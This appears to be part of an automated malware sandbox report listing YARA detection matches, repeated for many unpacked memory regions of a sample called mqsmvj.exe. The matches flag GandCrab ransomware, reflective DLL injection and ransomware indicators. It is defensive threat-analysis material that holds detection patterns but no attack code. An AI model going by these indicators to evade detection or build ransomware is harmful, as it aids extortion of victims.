                Source: 36.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 36.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 36.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 36.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 27.3.mqsmvj.exe.3490000.0.raw.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 27.3.mqsmvj.exe.3490000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 27.3.mqsmvj.exe.3490000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 27.3.mqsmvj.exe.3490000.0.raw.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 27.3.mqsmvj.exe.3490000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 16.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 16.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 16.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 28.3.mqsmvj.exe.3130000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 28.3.mqsmvj.exe.3130000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 28.3.mqsmvj.exe.3130000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 28.3.mqsmvj.exe.3130000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 28.3.mqsmvj.exe.3130000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 16.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 16.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 14.3.mqsmvj.exe.32b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 14.3.mqsmvj.exe.32b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 14.3.mqsmvj.exe.32b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 14.3.mqsmvj.exe.32b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 14.3.mqsmvj.exe.32b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 37.3.mqsmvj.exe.3bc0000.0.raw.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 37.3.mqsmvj.exe.3bc0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 37.3.mqsmvj.exe.3bc0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 37.3.mqsmvj.exe.3bc0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 37.3.mqsmvj.exe.3bc0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 35.3.mqsmvj.exe.3970000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 35.3.mqsmvj.exe.3970000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 35.3.mqsmvj.exe.3970000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 35.3.mqsmvj.exe.3970000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 35.3.mqsmvj.exe.3970000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 23.3.mqsmvj.exe.3a70000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 23.3.mqsmvj.exe.3a70000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 23.3.mqsmvj.exe.3a70000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 23.3.mqsmvj.exe.3a70000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 23.3.mqsmvj.exe.3a70000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 35.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 35.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 35.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 35.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 35.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 19.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 19.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 19.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 19.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 19.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 28.3.mqsmvj.exe.3130000.0.raw.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 28.3.mqsmvj.exe.3130000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 28.3.mqsmvj.exe.3130000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 28.3.mqsmvj.exe.3130000.0.raw.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 28.3.mqsmvj.exe.3130000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 12.3.mqsmvj.exe.2fb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 12.3.mqsmvj.exe.2fb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 12.3.mqsmvj.exe.2fb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 12.3.mqsmvj.exe.2fb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 12.3.mqsmvj.exe.2fb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 19.3.mqsmvj.exe.3930000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 19.3.mqsmvj.exe.3930000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 19.3.mqsmvj.exe.3930000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 19.3.mqsmvj.exe.3930000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 19.3.mqsmvj.exe.3930000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 39.3.mqsmvj.exe.2fb0000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 39.3.mqsmvj.exe.2fb0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 39.3.mqsmvj.exe.2fb0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 39.3.mqsmvj.exe.2fb0000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 39.3.mqsmvj.exe.2fb0000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 11.3.mqsmvj.exe.3290000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 11.3.mqsmvj.exe.3290000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 11.3.mqsmvj.exe.3290000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 11.3.mqsmvj.exe.3290000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 11.3.mqsmvj.exe.3290000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 38.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 38.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 38.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 38.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 38.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 30.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 30.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 30.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 30.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 30.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 39.3.mqsmvj.exe.2fb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 39.3.mqsmvj.exe.2fb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 39.3.mqsmvj.exe.2fb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 39.3.mqsmvj.exe.2fb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 39.3.mqsmvj.exe.2fb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 22.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 22.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 22.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 22.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 22.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 37.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 37.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 37.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 37.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 37.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 26.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 26.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 26.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 26.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 26.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
